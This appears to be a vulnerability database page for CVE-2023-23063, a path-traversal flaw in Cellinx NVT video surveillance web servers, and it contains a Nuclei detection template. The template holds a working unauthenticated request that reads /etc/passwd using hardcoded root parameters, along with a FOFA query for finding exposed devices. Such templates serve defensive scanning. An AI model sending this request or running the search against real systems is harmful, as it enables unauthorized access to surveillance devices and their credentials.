| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2023-23063 | 22 Feb 202315:15 | ā | attackerkb | |
| CVE-2023-23063 | 22 Feb 202318:31 | ā | circl | |
| Cellinx NVT č·Æå¾éåę¼ę“ | 22 Feb 202300:00 | ā | cnnvd | |
| CVE-2023-23063 | 22 Feb 202300:00 | ā | cve | |
| CVE-2023-23063 | 22 Feb 202300:00 | ā | cvelist | |
| CVE-2023-23063 | 22 Feb 202315:15 | ā | nvd | |
| CVE-2023-23063 | 22 Feb 202315:15 | ā | osv | |
| Arbitrary file deletion | 22 Feb 202315:15 | ā | prion | |
| PT-2023-18829 | 22 Feb 202300:00 | ā | ptsecurity | |
| CVE-2023-23063 | 23 May 202505:28 | ā | redhatcve |
id: CVE-2023-23063
info:
name: Cellinx NVT Web Server - Local File Disclosure
author: daffainfo
severity: high
description: |
Cellinx NVT v1.0.6.002b was discovered to contain a local file disclosure vulnerability via the component /cgi-bin/GetFileContent.cgi.
impact: |
Unauthenticated attackers can read arbitrary files from the server through the PATH parameter in GetFileContent.cgi, potentially exposing system credentials, configuration files, and sensitive video surveillance data.
remediation: |
Update Cellinx NVT to a version newer than 1.0.6.002b that validates file paths in GetFileContent.cgi and restricts file access to authorized directories only.
reference:
- https://github.com/ahmedalroky/Disclosures/tree/cellinx
- http://nvd.nist.gov/vuln/detail/CVE-2023-23063
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-23063
cwe-id: CWE-22
epss-score: 0.02431
epss-percentile: 0.82267
cpe: cpe:2.3:a:cellinx:nvt_web_server:1.0.6.002b:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: cellinx
product: nvt_web_server
fofa-query: body="/viewer/viewer.html" && header="lighttpd" && country="KR"
tags: cve,cve2023,cellinx,lfi,nvt,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "regex('root:.*:0:0:', body)"
- "contains(header, 'TRACKID=')"
condition: and
# digest: 490a0046304402200e3a03a71fc5657397d309aa496688b592901dc924cf293c177a561667fc4828022024eaf9b276f7e38c2e228323a4bb2275224887739d4ac439195404da067b30b8:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation